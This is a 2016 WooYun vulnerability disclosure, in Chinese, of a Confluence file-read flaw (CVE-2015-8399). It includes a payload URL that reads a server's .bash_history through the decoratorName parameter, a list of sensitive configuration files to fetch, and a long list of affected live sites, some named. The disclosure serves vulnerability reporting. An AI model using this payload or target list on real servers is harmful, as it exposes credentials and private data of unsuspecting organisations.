当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0207331

漏洞标题:apache/jboss/jetbrains/delphix等多家机构Wiki服务器文件遍历(含PoC)

相关厂商:cncert

漏洞作者: xyntax

提交时间:2016-05-11 12:50

修复时间:2016-06-25 15:10

公开时间:2016-06-25 15:10

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-05-11: 细节已通知厂商并且等待厂商处理中
2016-05-11: 厂商已经确认,细节仅向厂商公开
2016-05-21: 细节向核心白帽子及相关领域专家公开
2016-05-31: 细节向普通白帽子公开
2016-06-10: 细节向实习白帽子公开
2016-06-25: 细节向公众公开

简要描述:

也许我们该拯救一下世界了。仅供娱乐~

详细说明:

感觉这个洞杀伤力还是挺强的,详情在这里

http://**.**.**.**/content/27104


CVE描述的是可以读取配置文件
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8399
比如jetbrains的

微信截图_20160507185628_副本.png


这个洞我之前已邮件jetbrans,他们正在修复中
其他敏感目录

/WEB-INF/decorators.xml
/WEB-INF/glue-config.xml
/WEB-INF/server-config.wsdd
/WEB-INF/sitemesh.xml
/WEB-INF/urlrewrite.xml
/WEB-INF/web.xml
/databaseSubsystemContext.xml
/securityContext.xml
/services/statusServiceContext.xml
com/atlassian/confluence/security/SpacePermission.hbm.xml
com/atlassian/confluence/user/OSUUser.hbm.xml
com/atlassian/confluence/security/ContentPermissionSet.hbm.xml
com/atlassian/confluence/user/ConfluenceUser.hbm.xml


有权限的话就不只是读个配置文件这么简单了
http://**.**.**.**
读取bash_history

https://**.**.**.**//spaces/viewdefaultdecorator.action?decoratorName=file:///home/confluence/.bash_history


微信截图_20160511015808.png


web.xml

微信截图_20160511020424.png


敏感文件.db

微信截图_20160511015122.png


漏洞证明:

**.**.**.**

微信截图_20160511012709.png


**.**.**.**

jboss.png


**.**.**.**

apache.png


还有好多

http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**:8090
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
https://cwiki.**.**.**.**
http://**.**.**.**
http://www.beecom.ch
http://confluence.slac.**.**.**.**
http://**.**.**.**
http://**.**.**.**
https://**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://wiki.auckland.ac.nz
http://**.**.**.**
https://**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://cwiki.**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
https://docs.**.**.**.**
http://doc.ez.no
http://www.meta-inf.hu
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
https://**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://www.**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://confluence.ryerson.ca
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
https://**.**.**.**
https://**.**.**.**
http://**.**.**.**
https://**.**.**.**
http://**.**.**.**
http://**.**.**.**
https://**.**.**.**
http://**.**.**.**
https://**.**.**.**.au
http://**.**.**.**.au
http://**.**.**.**
https://wiki.nci.nih.gov
https://**.**.**.**
http://**.**.**.**
https://**.**.**.**
http://**.**.**.**


脚本:

https://**.**.**.**/Xyntax/POC-T/blob/master/module/confluence-file-read.py

修复方案:

jetbrains还在思考:

微信截图_20160511022219.png


版权声明:转载请注明来源 xyntax@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2016-05-11 15:01

厂商回复:

CNVD确认所述漏洞情况,暂未建立与上述网站管理单位的直接处置渠道,待认领。

最新状态:

暂无